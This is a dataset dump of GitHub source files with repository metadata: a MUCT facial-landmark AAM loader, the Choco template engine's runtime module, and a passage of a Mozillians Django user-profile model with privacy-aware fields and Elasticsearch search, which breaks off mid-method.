repo_name (string, 5-92 chars) | path (string, 4-232 chars) | copies (19 classes) | size (string, 4-7 chars) | content (string, 721-1.04M chars) | license (15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
doc-E-brown/FacialLandmarkingReview | experiments/Sec4_ModelDefinition/muctAAM.py | 1 | 2082 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# S.D.G
"""AAM test for MUCT dataset
:author: Ben Johnston
:license: 3-Clause BSD
"""
# Imports
import os
import menpo.io as mio
from aam import AAM
from menpofit.aam import HolisticAAM, PatchAAM
from sklearn.model_selection import train_test_split
MUCT_DATA_FOLDER = os.getenv('MUCT_DATA', '~/datasets/muct')
class MuctAAM(AAM):
""" MUCT AAM class """
def __init__(self, path_to_data=MUCT_DATA_FOLDER,
model_type=HolisticAAM, basename='muct_aam', verbose=True):
super(MuctAAM, self).__init__(
path_to_data, model_type, basename, verbose)
def load_data(self, crop_percentage=0.1,
test_set_ratio=0.3, max_images=None):
""" Load the images and landmarks in an menpo.io
format and crop the images using the specified
landmarks as a guide
Parameters
---------
"""
images = []
for i in mio.import_images(
self.filepath, max_images=max_images, verbose=self.verbose):
if i.landmarks['PTS'].lms.points.shape[0] != 76:
continue
i = i.crop_to_landmarks_proportion(crop_percentage)
# Convert to grayscale if required
if i.n_channels == 3:
i = i.as_greyscale() # Default to luminosity
images.append(i)
# Split into training and test sets
self.train_set, self.test_set =\
train_test_split(images, test_size=test_set_ratio, random_state=42)
def _crop_grayscale_images(self, filepath, crop_percentage):
images = []
for i in mio.import_images(
filepath, max_images=None, verbose=self.verbose):
i = i.crop_to_landmarks_proportion(crop_percentage)
# Convert to grayscale if required
if i.n_channels == 3:
i = i.as_greyscale() # Default to luminosity
# Due to large training set size use generators for better memory
# efficiency
yield i
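# --- Editor's sketch (not part of the original file) --------------------------
# Hypothetical usage of the class above; it assumes a MUCT-format dataset with
# 76-point PTS landmarks is available under MUCT_DATA_FOLDER, and reuses the
# PatchAAM model type already imported at the top of this module.
def _example_muct_aam_usage():  # pragma: no cover - illustrative only
    aam = MuctAAM(model_type=PatchAAM, verbose=True)
    aam.load_data(crop_percentage=0.1, test_set_ratio=0.3, max_images=50)
    return aam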
| gpl-3.0 | -6,800,944,591,862,461,000 | 26.76 | 79 | 0.587896 | false |
whiteclover/Choco | choco/runtime.py | 1 | 28308 | # choco/runtime.py
# Copyright (C) 2006-2016 the Choco authors and contributors <see AUTHORS file>
#
# This module is part of Choco and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""provides runtime services for templates, including Context,
Namespace, and various helper functions."""
from choco import errors, util, compat
from choco.compat import compat_builtins
import sys
class Context(object):
"""Provides runtime namespace, output buffer, and various
callstacks for templates.
See :ref:`runtime_toplevel` for detail on the usage of
:class:`.Context`.
"""
def __init__(self, buffer, **data):
self._buffer_stack = [buffer]
self._data = data
self._kwargs = data.copy()
self._with_template = None
self._outputting_as_unicode = None
self.namespaces = {}
# "capture" function which proxies to the
# generic "capture" function
self._data['capture'] = compat.partial(capture, self)
# "caller" stack used by def calls with content
self.caller_stack = self._data['caller'] = CallerStack()
def _set_with_template(self, t):
self._with_template = t
illegal_names = t.reserved_names.intersection(self._data)
if illegal_names:
raise errors.NameConflictError(
"Reserved words passed to render(): %s" %
", ".join(illegal_names))
@property
def lookup(self):
"""Return the :class:`.TemplateLookup` associated
with this :class:`.Context`.
"""
return self._with_template.lookup
@property
def kwargs(self):
"""Return the dictionary of top level keyword arguments associated
with this :class:`.Context`.
This dictionary only includes the top-level arguments passed to
:meth:`.Template.render`. It does not include names produced within
the template execution such as local variable names or special names
such as ``self``, ``next``, etc.
The purpose of this dictionary is primarily for the case that
a :class:`.Template` accepts arguments via its ``<%page>`` tag,
which are normally expected to be passed via :meth:`.Template.render`,
except the template is being called in an inheritance context,
using the ``body()`` method. :attr:`.Context.kwargs` can then be
used to propagate these arguments to the inheriting template::
${next.body(**context.kwargs)}
"""
return self._kwargs.copy()
def push_caller(self, caller):
"""Push a ``caller`` callable onto the callstack for
this :class:`.Context`."""
self.caller_stack.append(caller)
def pop_caller(self):
"""Pop a ``caller`` callable onto the callstack for this
:class:`.Context`."""
del self.caller_stack[-1]
def keys(self):
"""Return a list of all names established in this :class:`.Context`."""
return list(self._data.keys())
def __getitem__(self, key):
if key in self._data:
return self._data[key]
else:
return compat_builtins.__dict__[key]
def _push_writer(self):
"""push a capturing buffer onto this Context and return
the new writer function."""
buf = util.FastEncodingBuffer()
self._buffer_stack.append(buf)
return buf.write
def _pop_buffer_and_writer(self):
"""pop the most recent capturing buffer from this Context
and return the current writer after the pop.
"""
buf = self._buffer_stack.pop()
return buf, self._buffer_stack[-1].write
def _push_buffer(self):
"""push a capturing buffer onto this Context."""
self._push_writer()
def _pop_buffer(self):
"""pop the most recent capturing buffer from this Context."""
return self._buffer_stack.pop()
def get(self, key, default=None):
"""Return a value from this :class:`.Context`."""
return self._data.get(key, compat_builtins.__dict__.get(key, default))
def write(self, string):
"""Write a string to this :class:`.Context` object's
underlying output buffer."""
self._buffer_stack[-1].write(string)
def writer(self):
"""Return the current writer function."""
return self._buffer_stack[-1].write
def _copy(self):
c = Context.__new__(Context)
c._buffer_stack = self._buffer_stack
c._data = self._data.copy()
c._kwargs = self._kwargs
c._with_template = self._with_template
c._outputting_as_unicode = self._outputting_as_unicode
c.namespaces = self.namespaces
c.caller_stack = self.caller_stack
return c
def _locals(self, d):
"""Create a new :class:`.Context` with a copy of this
:class:`.Context`'s current state,
updated with the given dictionary.
The :attr:`.Context.kwargs` collection remains
unaffected.
"""
if not d:
return self
c = self._copy()
c._data.update(d)
return c
def _clean_inheritance_tokens(self):
"""create a new copy of this :class:`.Context`. with
tokens related to inheritance state removed."""
c = self._copy()
x = c._data
x.pop('self', None)
x.pop('parent', None)
x.pop('next', None)
return c
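# --- Editor's sketch (not part of the original file) --------------------------
# Minimal standalone use of Context: any object with a ``write`` method works
# as the buffer; compat.StringIO (also used by _render further down) keeps the
# example self-contained.
def _example_context_usage():  # pragma: no cover - illustrative only
    buf = compat.StringIO()
    ctx = Context(buf, greeting='hello')
    ctx.write(ctx.get('greeting'))
    return buf.getvalue()  # 'hello'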
class CallerStack(list):
def __init__(self):
self.nextcaller = None
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return len(self) and self._get_caller() and True or False
def _get_caller(self):
# this method can be removed once
# codegen MAGIC_NUMBER moves past 7
return self[-1]
def __getattr__(self, key):
return getattr(self._get_caller(), key)
def _push_frame(self):
frame = self.nextcaller or None
self.append(frame)
self.nextcaller = None
return frame
def _pop_frame(self):
self.nextcaller = self.pop()
class Undefined(object):
"""Represents an undefined value in a template.
All template modules have a constant value
``UNDEFINED`` present which is an instance of this
object.
"""
def __str__(self):
raise NameError("Undefined")
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return False
UNDEFINED = Undefined()
STOP_RENDERING = ""
class LoopStack(object):
"""a stack for LoopContexts that implements the context manager protocol
to automatically pop off the top of the stack on context exit
"""
def __init__(self):
self.stack = []
def _enter(self, iterable):
self._push(iterable)
return self._top
def _exit(self):
self._pop()
return self._top
@property
def _top(self):
if self.stack:
return self.stack[-1]
else:
return self
def _pop(self):
return self.stack.pop()
def _push(self, iterable):
new = LoopContext(iterable)
if self.stack:
new.parent = self.stack[-1]
return self.stack.append(new)
def __getattr__(self, key):
raise errors.RuntimeException("No loop context is established")
def __iter__(self):
return iter(self._top)
class LoopContext(object):
"""A magic loop variable.
Automatically accessible in any ``% for`` block.
See the section :ref:`loop_context` for usage
notes.
:attr:`parent` -> :class:`.LoopContext` or ``None``
The parent loop, if one exists.
:attr:`index` -> `int`
The 0-based iteration count.
:attr:`reverse_index` -> `int`
The number of iterations remaining.
:attr:`first` -> `bool`
``True`` on the first iteration, ``False`` otherwise.
:attr:`last` -> `bool`
``True`` on the last iteration, ``False`` otherwise.
:attr:`even` -> `bool`
``True`` when ``index`` is even.
:attr:`odd` -> `bool`
``True`` when ``index`` is odd.
"""
def __init__(self, iterable):
self._iterable = iterable
self.index = 0
self.parent = None
def __iter__(self):
for i in self._iterable:
yield i
self.index += 1
@util.memoized_instancemethod
def __len__(self):
return len(self._iterable)
@property
def reverse_index(self):
return len(self) - self.index - 1
@property
def first(self):
return self.index == 0
@property
def last(self):
return self.index == len(self) - 1
@property
def even(self):
return not self.odd
@property
def odd(self):
return bool(self.index % 2)
def cycle(self, *values):
"""Cycle through values as the loop progresses.
"""
if not values:
raise ValueError("You must provide values to cycle through")
return values[self.index % len(values)]
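# --- Editor's sketch (not part of the original file) --------------------------
# Inside templates the ``loop`` variable is managed by LoopStack; this
# standalone sketch only demonstrates the per-iteration attributes documented
# in the LoopContext docstring above.
def _example_loop_context():  # pragma: no cover - illustrative only
    loop = LoopContext(['a', 'b', 'c'])
    rows = []
    for item in loop:
        # index is advanced by __iter__ after each yield, so it is still the
        # current 0-based position while the loop body runs
        rows.append((item, loop.index, loop.first, loop.last,
                     loop.cycle('odd', 'even')))
    return rows  # [('a', 0, True, False, 'odd'), ('b', 1, False, False, 'even'), ...]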
class _NSAttr(object):
def __init__(self, parent):
self.__parent = parent
def __getattr__(self, key):
ns = self.__parent
while ns:
if hasattr(ns.module, key):
return getattr(ns.module, key)
else:
ns = ns.inherits
raise AttributeError(key)
class Namespace(object):
"""Provides access to collections of rendering methods, which
can be local, from other templates, or from imported modules.
To access a particular rendering method referenced by a
:class:`.Namespace`, use plain attribute access:
.. sourcecode:: choco
${some_namespace.foo(x, y, z)}
:class:`.Namespace` also contains several built-in attributes
described here.
"""
def __init__(self, name, context,
callables=None, inherits=None,
populate_self=True, calling_uri=None):
self.name = name
self.context = context
self.inherits = inherits
if callables is not None:
self.callables = dict([(c.__name__, c) for c in callables])
callables = ()
module = None
"""The Python module referenced by this :class:`.Namespace`.
If the namespace references a :class:`.Template`, then
this module is the equivalent of ``template.module``,
i.e. the generated module for the template.
"""
template = None
"""The :class:`.Template` object referenced by this
:class:`.Namespace`, if any.
"""
context = None
"""The :class:`.Context` object for this :class:`.Namespace`.
Namespaces are often created with copies of contexts that
contain slightly different data, particularly in inheritance
scenarios. Using the :class:`.Context` off of a :class:`.Namespace` one
can traverse an entire chain of templates that inherit from
one-another.
"""
filename = None
"""The path of the filesystem file used for this
:class:`.Namespace`'s module or template.
If this is a pure module-based
:class:`.Namespace`, this evaluates to ``module.__file__``. If a
template-based namespace, it evaluates to the original
template file location.
"""
uri = None
"""The URI for this :class:`.Namespace`'s template.
I.e. whatever was sent to :meth:`.TemplateLookup.get_template()`.
This is the equivalent of :attr:`.Template.uri`.
"""
_templateuri = None
@util.memoized_property
def attr(self):
"""Access module level attributes by name.
This accessor allows templates to supply "scalar"
attributes which are particularly handy in inheritance
relationships.
.. seealso::
:ref:`inheritance_attr`
:ref:`namespace_attr_for_includes`
"""
return _NSAttr(self)
def get_namespace(self, uri):
"""Return a :class:`.Namespace` corresponding to the given ``uri``.
If the given ``uri`` is a relative URI (i.e. it does not
contain a leading slash ``/``), the ``uri`` is adjusted to
be relative to the ``uri`` of the namespace itself. This
method is therefore mostly useful off of the built-in
``local`` namespace, described in :ref:`namespace_local`.
In
most cases, a template wouldn't need this function, and
should instead use the ``<%namespace>`` tag to load
namespaces. However, since all ``<%namespace>`` tags are
evaluated before the body of a template ever runs,
this method can be used to locate namespaces using
expressions that were generated within the body code of
the template, or to conditionally use a particular
namespace.
"""
key = (self, uri)
if key in self.context.namespaces:
return self.context.namespaces[key]
else:
ns = TemplateNamespace(uri, self.context._copy(),
templateuri=uri,
calling_uri=self._templateuri)
self.context.namespaces[key] = ns
return ns
def get_template(self, uri):
"""Return a :class:`.Template` from the given ``uri``.
The ``uri`` resolution is relative to the ``uri`` of this
:class:`.Namespace` object's :class:`.Template`.
"""
return _lookup_template(self.context, uri, self._templateuri)
def get_cached(self, key, **kwargs):
"""Return a value from the :class:`.Cache` referenced by this
:class:`.Namespace` object's :class:`.Template`.
The advantage to this method versus direct access to the
:class:`.Cache` is that the configuration parameters
declared in ``<%page>`` take effect here, thereby calling
up the same configured backend as that configured
by ``<%page>``.
"""
return self.cache.get(key, **kwargs)
@property
def cache(self):
"""Return the :class:`.Cache` object referenced
by this :class:`.Namespace` object's
:class:`.Template`.
"""
return self.template.cache
def include_file(self, uri, **kwargs):
"""Include a file at the given ``uri``."""
_include_file(self.context, uri, self._templateuri, **kwargs)
def _populate(self, d, l):
for ident in l:
if ident == '*':
for (k, v) in self._get_star():
d[k] = v
else:
d[ident] = getattr(self, ident)
def _get_star(self):
if self.callables:
for key in self.callables:
yield (key, self.callables[key])
def __getattr__(self, key):
if key in self.callables:
val = self.callables[key]
elif self.inherits:
val = getattr(self.inherits, key)
else:
raise AttributeError(
"Namespace '%s' has no member '%s'" %
(self.name, key))
setattr(self, key, val)
return val
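# --- Editor's note (sketch, not part of the original file) --------------------
# get_namespace() resolves relative URIs against this namespace's own template
# URI via the associated TemplateLookup.  So, in a template rendered from a
# hypothetical '/admin/page.html', something like
#
#     <% helpers = local.get_namespace('helpers.html') %>
#
# would load '/admin/helpers.html', whereas '<%namespace>' tags remain the
# statically-declared route (they are evaluated before the template body runs).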
class TemplateNamespace(Namespace):
"""A :class:`.Namespace` specific to a :class:`.Template` instance."""
def __init__(self, name, context, template=None, templateuri=None,
callables=None, inherits=None,
populate_self=True, calling_uri=None):
self.name = name
self.context = context
self.inherits = inherits
if callables is not None:
self.callables = dict([(c.__name__, c) for c in callables])
if templateuri is not None:
self.template = _lookup_template(context, templateuri,
calling_uri)
self._templateuri = self.template.module._template_uri
elif template is not None:
self.template = template
self._templateuri = template.module._template_uri
else:
raise TypeError("'template' argument is required.")
if populate_self:
lclcallable, lclcontext = \
_populate_self_namespace(context, self.template,
self_ns=self)
@property
def module(self):
"""The Python module referenced by this :class:`.Namespace`.
If the namespace references a :class:`.Template`, then
this module is the equivalent of ``template.module``,
i.e. the generated module for the template.
"""
return self.template.module
@property
def filename(self):
"""The path of the filesystem file used for this
:class:`.Namespace`'s module or template.
"""
return self.template.filename
@property
def uri(self):
"""The URI for this :class:`.Namespace`'s template.
I.e. whatever was sent to :meth:`.TemplateLookup.get_template()`.
This is the equivalent of :attr:`.Template.uri`.
"""
return self.template.uri
def _get_star(self):
if self.callables:
for key in self.callables:
yield (key, self.callables[key])
def get(key):
callable_ = self.template._get_def_callable(key)
return compat.partial(callable_, self.context)
for k in self.template.module._exports:
yield (k, get(k))
def __getattr__(self, key):
if key in self.callables:
val = self.callables[key]
elif self.template.has_def(key):
callable_ = self.template._get_def_callable(key)
val = compat.partial(callable_, self.context)
elif self.inherits:
val = getattr(self.inherits, key)
else:
raise AttributeError(
"Namespace '%s' has no member '%s'" %
(self.name, key))
setattr(self, key, val)
return val
class ModuleNamespace(Namespace):
"""A :class:`.Namespace` specific to a Python module instance."""
def __init__(self, name, context, module,
callables=None, inherits=None,
populate_self=True, calling_uri=None):
self.name = name
self.context = context
self.inherits = inherits
if callables is not None:
self.callables = dict([(c.__name__, c) for c in callables])
mod = __import__(module)
for token in module.split('.')[1:]:
mod = getattr(mod, token)
self.module = mod
@property
def filename(self):
"""The path of the filesystem file used for this
:class:`.Namespace`'s module or template.
"""
return self.module.__file__
def _get_star(self):
if self.callables:
for key in self.callables:
yield (key, self.callables[key])
for key in dir(self.module):
if key[0] != '_':
callable_ = getattr(self.module, key)
if compat.callable(callable_):
yield key, compat.partial(callable_, self.context)
def __getattr__(self, key):
if key in self.callables:
val = self.callables[key]
elif hasattr(self.module, key):
callable_ = getattr(self.module, key)
val = compat.partial(callable_, self.context)
elif self.inherits:
val = getattr(self.inherits, key)
else:
raise AttributeError(
"Namespace '%s' has no member '%s'" %
(self.name, key))
setattr(self, key, val)
return val
def supports_caller(func):
"""Apply a caller_stack compatibility decorator to a plain
Python function.
See the example in :ref:`namespaces_python_modules`.
"""
def wrap_stackframe(context, *args, **kwargs):
context.caller_stack._push_frame()
try:
return func(context, *args, **kwargs)
finally:
context.caller_stack._pop_frame()
return wrap_stackframe
def capture(context, callable_, *args, **kwargs):
"""Execute the given template def, capturing the output into
a buffer.
See the example in :ref:`namespaces_python_modules`.
"""
if not compat.callable(callable_):
raise errors.RuntimeException(
"capture() function expects a callable as "
"its argument (i.e. capture(func, *args, **kwargs))"
)
context._push_buffer()
try:
callable_(*args, **kwargs)
finally:
buf = context._pop_buffer()
return buf.getvalue()
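# --- Editor's sketch (not part of the original file) --------------------------
# capture() runs a callable while a temporary buffer is pushed on the Context,
# then returns the buffered text instead of writing it to the normal output.
def _example_capture(context):  # pragma: no cover - illustrative only
    def shout(word):
        context.write(word.upper())
    return capture(context, shout, 'hello')  # 'HELLO'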
def _decorate_toplevel(fn):
def decorate_render(render_fn):
def go(context, *args, **kw):
def y(*args, **kw):
return render_fn(context, *args, **kw)
try:
y.__name__ = render_fn.__name__[7:]
except TypeError:
# < Python 2.4
pass
return fn(y)(context, *args, **kw)
return go
return decorate_render
def _decorate_inline(context, fn):
def decorate_render(render_fn):
dec = fn(render_fn)
def go(*args, **kw):
return dec(context, *args, **kw)
return go
return decorate_render
def _include_file(context, uri, calling_uri, **kwargs):
"""locate the template from the given uri and include it in
the current output."""
template = _lookup_template(context, uri, calling_uri)
(callable_, ctx) = _populate_self_namespace(
context._clean_inheritance_tokens(),
template)
callable_(ctx, **_kwargs_for_include(callable_, context._data, **kwargs))
def _include_ui(context, ui, template_uri, *args, **kwargs):
uicls = _lookup_uicls(context, ui)
ui_module = uicls(context)
ui_module._execute(*args, **kwargs)
def _inherit_from(context, uri, calling_uri):
"""called by the _inherit method in template modules to set
up the inheritance chain at the start of a template's
execution."""
if uri is None:
return None
template = _lookup_template(context, uri, calling_uri)
self_ns = context['self']
ih = self_ns
while ih.inherits is not None:
ih = ih.inherits
lclcontext = context._locals({'next': ih})
ih.inherits = TemplateNamespace("self:%s" % template.uri,
lclcontext,
template=template,
populate_self=False)
context._data['parent'] = lclcontext._data['local'] = ih.inherits
callable_ = getattr(template.module, '_choco_inherit', None)
if callable_ is not None:
ret = callable_(template, lclcontext)
if ret:
return ret
gen_ns = getattr(template.module, '_choco_generate_namespaces', None)
if gen_ns is not None:
gen_ns(context)
return (template.callable_, lclcontext)
def _lookup_uicls(context, ui):
lookup = context._with_template.lookup
if lookup is None:
raise errors.TemplateLookupException(
"Template '%s' has no TemplateLookup associated" %
context._with_template.uri)
uicls = lookup.get_ui(ui)
return uicls
def _lookup_template(context, uri, relativeto):
lookup = context._with_template.lookup
if lookup is None:
raise errors.TemplateLookupException(
"Template '%s' has no TemplateLookup associated" %
context._with_template.uri)
uri = lookup.adjust_uri(uri, relativeto)
try:
return lookup.get_template(uri)
except errors.TopLevelLookupException:
raise errors.TemplateLookupException(str(compat.exception_as()))
def _populate_self_namespace(context, template, self_ns=None):
if self_ns is None:
self_ns = TemplateNamespace('self:%s' % template.uri,
context, template=template,
populate_self=False)
context._data['self'] = context._data['local'] = self_ns
if hasattr(template.module, '_choco_inherit'):
ret = template.module._choco_inherit(template, context)
if ret:
return ret
return (template.callable_, context)
def _render(template, callable_, args, data, as_unicode=False):
"""create a Context and return the string
output of the given template and template callable."""
if as_unicode:
buf = util.FastEncodingBuffer(as_unicode=True)
elif template.bytestring_passthrough:
buf = compat.StringIO()
else:
buf = util.FastEncodingBuffer(
as_unicode=as_unicode,
encoding=template.output_encoding,
errors=template.encoding_errors)
context = Context(buf, **data)
context._outputting_as_unicode = as_unicode
context._set_with_template(template)
_render_context(template, callable_, context, *args,
**_kwargs_for_callable(callable_, data))
return context._pop_buffer().getvalue()
def _render_ui(template, callable_, pctx, args, data):
context = Context(pctx._buffer_stack[-1], **data)
context._outputting_as_unicode = pctx._outputting_as_unicode
context._set_with_template(template)
_render_context(template, callable_, context)
def _kwargs_for_callable(callable_, data):
argspec = compat.inspect_func_args(callable_)
# for normal pages, **pageargs is usually present
if argspec[2]:
return data
# for rendering defs from the top level, figure out the args
namedargs = argspec[0] + [v for v in argspec[1:3] if v is not None]
kwargs = {}
for arg in namedargs:
if arg != 'context' and arg in data and arg not in kwargs:
kwargs[arg] = data[arg]
return kwargs
def _kwargs_for_include(callable_, data, **kwargs):
argspec = compat.inspect_func_args(callable_)
namedargs = argspec[0] + [v for v in argspec[1:3] if v is not None]
for arg in namedargs:
if arg != 'context' and arg in data and arg not in kwargs:
kwargs[arg] = data[arg]
return kwargs
def _render_context(tmpl, callable_, context, *args, **kwargs):
import choco.template as template
# create polymorphic 'self' namespace for this
# template with possibly updated context
if not isinstance(tmpl, template.DefTemplate):
# if main render method, call from the base of the inheritance stack
(inherit, lclcontext) = _populate_self_namespace(context, tmpl)
_exec_template(inherit, lclcontext, args=args, kwargs=kwargs)
else:
# otherwise, call the actual rendering method specified
(inherit, lclcontext) = _populate_self_namespace(context, tmpl.parent)
_exec_template(callable_, context, args=args, kwargs=kwargs)
def _exec_template(callable_, context, args=None, kwargs=None):
"""execute a rendering callable given the callable, a
Context, and optional explicit arguments
the contextual Template will be located if it exists, and
the error handling options specified on that Template will
be interpreted here.
"""
template = context._with_template
if template is not None and \
(template.format_errors or template.error_handler):
try:
callable_(context, *args, **kwargs)
except Exception:
_render_error(template, context, compat.exception_as())
except:
e = sys.exc_info()[0]
_render_error(template, context, e)
else:
callable_(context, *args, **kwargs)
def _render_error(template, context, error):
if template.error_handler:
result = template.error_handler(context, error)
if not result:
compat.reraise(*sys.exc_info())
else:
error_template = errors.html_error_template()
if context._outputting_as_unicode:
context._buffer_stack[:] = [
util.FastEncodingBuffer(as_unicode=True)]
else:
context._buffer_stack[:] = [util.FastEncodingBuffer(
error_template.output_encoding,
error_template.encoding_errors)]
context._set_with_template(error_template)
error_template.render_context(context, error=error)
| mit | -24,096,702,235,384,970 | 29.50431 | 79 | 0.593966 | false |
glogiotatidis/mozillians-new | mozillians/users/models.py | 1 | 18988 | import os
import uuid
from datetime import datetime
from django.conf import settings
from django.contrib.auth.models import User
from django.core.mail import send_mail
from django.db import models
from django.db.models import signals as dbsignals
from django.dispatch import receiver
from elasticutils.contrib.django import S, get_es
from elasticutils.contrib.django.models import SearchMixin
from funfactory.urlresolvers import reverse
from product_details import product_details
from sorl.thumbnail import ImageField, get_thumbnail
from tower import ugettext as _, ugettext_lazy as _lazy
from mozillians.common.helpers import gravatar
from mozillians.groups.models import (Group, GroupAlias,
Skill, SkillAlias,
Language, LanguageAlias)
from mozillians.users import (EMPLOYEES, MOZILLIANS, PUBLIC, PRIVACY_CHOICES,
DEFAULT_PRIVACY_FIELDS, PUBLIC_INDEXABLE_FIELDS)
from mozillians.users.managers import UserProfileManager
from mozillians.users.tasks import (update_basket_task, index_objects,
unindex_objects)
COUNTRIES = product_details.get_regions('en-US')
USERNAME_MAX_LENGTH = 30
AVATAR_SIZE = (300, 300)
def _calculate_photo_filename(instance, filename):
"""Generate a unique filename for uploaded photo."""
return os.path.join(settings.USER_AVATAR_DIR, str(uuid.uuid4()) + '.jpg')
class PrivacyField(models.PositiveSmallIntegerField):
def __init__(self, *args, **kwargs):
myargs = {'default': MOZILLIANS,
'choices': PRIVACY_CHOICES}
myargs.update(kwargs)
return super(PrivacyField, self).__init__(*args, **myargs)
class PrivacyAwareS(S):
def privacy_level(self, level=MOZILLIANS):
"""Set privacy level for query set."""
self._privacy_level = level
return self
def _clone(self, *args, **kwargs):
new = super(PrivacyAwareS, self)._clone(*args, **kwargs)
new._privacy_level = getattr(self, '_privacy_level', None)
return new
def __iter__(self):
self._iterator = super(PrivacyAwareS, self).__iter__()
def _generator():
while True:
obj = self._iterator.next()
obj._privacy_level = getattr(self, '_privacy_level', None)
yield obj
return _generator()
class UserProfilePrivacyModel(models.Model):
_privacy_fields = DEFAULT_PRIVACY_FIELDS
_privacy_level = None
privacy_photo = PrivacyField()
privacy_full_name = PrivacyField()
privacy_ircname = PrivacyField()
privacy_email = PrivacyField()
privacy_website = PrivacyField()
privacy_bio = PrivacyField()
privacy_city = PrivacyField()
privacy_region = PrivacyField()
privacy_country = PrivacyField()
privacy_groups = PrivacyField()
privacy_skills = PrivacyField()
privacy_languages = PrivacyField()
privacy_vouched_by = PrivacyField()
class Meta:
        abstract = True
class UserProfile(UserProfilePrivacyModel, SearchMixin):
objects = UserProfileManager()
user = models.OneToOneField(User)
full_name = models.CharField(max_length=255, default='', blank=False,
verbose_name=_lazy(u'Full Name'))
is_vouched = models.BooleanField(default=False)
last_updated = models.DateTimeField(auto_now=True, default=datetime.now)
website = models.URLField(max_length=200, verbose_name=_lazy(u'Website'),
default='', blank=True)
vouched_by = models.ForeignKey('UserProfile', null=True, default=None,
on_delete=models.SET_NULL, blank=True,
related_name='vouchees')
date_vouched = models.DateTimeField(null=True, blank=True, default=None)
groups = models.ManyToManyField(Group, blank=True, related_name='members')
skills = models.ManyToManyField(Skill, blank=True, related_name='members')
languages = models.ManyToManyField(Language, blank=True,
related_name='members')
bio = models.TextField(verbose_name=_lazy(u'Bio'), default='', blank=True)
photo = ImageField(default='', blank=True,
upload_to=_calculate_photo_filename)
ircname = models.CharField(max_length=63,
verbose_name=_lazy(u'IRC Nickname'),
default='', blank=True)
country = models.CharField(max_length=50, default='',
choices=COUNTRIES.items(),
verbose_name=_lazy(u'Country'))
region = models.CharField(max_length=255, default='', blank=True,
verbose_name=_lazy(u'Province/State'))
city = models.CharField(max_length=255, default='', blank=True,
verbose_name=_lazy(u'City'))
allows_community_sites = models.BooleanField(
default=True,
verbose_name=_lazy(u'Sites that can determine my vouched status'),
choices=((True, _lazy(u'All Community Sites')),
(False, _lazy(u'Only Mozilla Properties'))))
allows_mozilla_sites = models.BooleanField(
default=True,
verbose_name=_lazy(u'Allow Mozilla sites to access my profile data?'),
choices=((True, _lazy(u'Yes')), (False, _lazy(u'No'))))
basket_token = models.CharField(max_length=1024, default='', blank=True)
class Meta:
db_table = 'profile'
ordering = ['full_name']
def __getattribute__(self, attrname):
_getattr = (lambda x:
super(UserProfile, self).__getattribute__(x))
privacy_fields = _getattr('_privacy_fields')
privacy_level = _getattr('_privacy_level')
if privacy_level is not None and attrname in privacy_fields:
field_privacy = _getattr('privacy_%s' % attrname)
if field_privacy < privacy_level:
return privacy_fields.get(attrname)
return super(UserProfile, self).__getattribute__(attrname)
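    # --- Editor's note (sketch, not part of the original file) ---------------
    # __getattribute__ above masks any field whose per-field privacy setting is
    # stricter than the viewer's clearance.  Roughly:
    #
    #     profile.set_instance_privacy_level(PUBLIC)   # view as anonymous
    #     profile.full_name  # -> placeholder from DEFAULT_PRIVACY_FIELDS when
    #                        #    privacy_full_name is left at MOZILLIANS
    #
    # PUBLIC and MOZILLIANS are the privacy constants imported at the top of
    # this module.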
@classmethod
def extract_document(cls, obj_id, obj=None):
"""Method used by elasticutils."""
if obj is None:
obj = cls.objects.get(pk=obj_id)
d = {}
attrs = ('id', 'is_vouched', 'website', 'ircname',
'region', 'city', 'allows_mozilla_sites',
'allows_community_sites')
for a in attrs:
data = getattr(obj, a)
if isinstance(data, basestring):
data = data.lower()
d.update({a: data})
if obj.country:
d.update({'country':
[obj.country, COUNTRIES[obj.country].lower()]})
# user data
attrs = ('username', 'email', 'last_login', 'date_joined')
for a in attrs:
data = getattr(obj.user, a)
if isinstance(data, basestring):
data = data.lower()
d.update({a: data})
d.update(dict(fullname=obj.full_name.lower()))
d.update(dict(name=obj.full_name.lower()))
d.update(dict(bio=obj.bio))
d.update(dict(has_photo=bool(obj.photo)))
for attribute in ['groups', 'skills', 'languages']:
groups = []
for g in getattr(obj, attribute).all():
groups.extend(g.aliases.values_list('name', flat=True))
d[attribute] = groups
return d
@classmethod
def get_mapping(cls):
"""Returns an ElasticSearch mapping."""
return {
'properties': {
'id': {'type': 'integer'},
'name': {'type': 'string', 'index': 'not_analyzed'},
'fullname': {'type': 'string', 'analyzer': 'standard'},
'email': {'type': 'string', 'index': 'not_analyzed'},
'ircname': {'type': 'string', 'index': 'not_analyzed'},
'username': {'type': 'string', 'index': 'not_analyzed'},
'country': {'type': 'string', 'analyzer': 'whitespace'},
'region': {'type': 'string', 'analyzer': 'whitespace'},
'city': {'type': 'string', 'analyzer': 'whitespace'},
'skills': {'type': 'string', 'analyzer': 'whitespace'},
'groups': {'type': 'string', 'analyzer': 'whitespace'},
'languages': {'type': 'string', 'index': 'not_analyzed'},
'bio': {'type': 'string', 'analyzer': 'snowball'},
'is_vouched': {'type': 'boolean'},
'allows_mozilla_sites': {'type': 'boolean'},
'allows_community_sites': {'type': 'boolean'},
'photo': {'type': 'boolean'},
'website': {'type': 'string', 'index': 'not_analyzed'},
'last_updated': {'type': 'date'},
'date_joined': {'type': 'date'}}}
@classmethod
def search(cls, query, include_non_vouched=False, public=False):
"""Sensible default search for UserProfiles."""
query = query.lower().strip()
fields = ('username', 'bio__text', 'email', 'ircname',
'country__text', 'country__text_phrase',
'region__text', 'region__text_phrase',
'city__text', 'city__text_phrase',
'fullname__text', 'fullname__text_phrase',
                  'fullname__prefix', 'fullname__fuzzy',
                  'groups__text')
s = PrivacyAwareS(cls)
if public:
s = s.privacy_level(PUBLIC)
s = s.indexes(cls.get_index(public))
if query:
q = dict((field, query) for field in fields)
s = (s.boost(fullname__text_phrase=5, username=5, email=5,
ircname=5, fullname__text=4, country__text_phrase=4,
region__text_phrase=4, city__text_phrase=4,
fullname__prefix=3, fullname__fuzzy=2,
bio__text=2).query(or_=q))
s = s.order_by('_score', 'name')
if not include_non_vouched:
s = s.filter(is_vouched=True)
return s
@property
def email(self):
"""Privacy aware email property."""
if self._privacy_level and self.privacy_email < self._privacy_level:
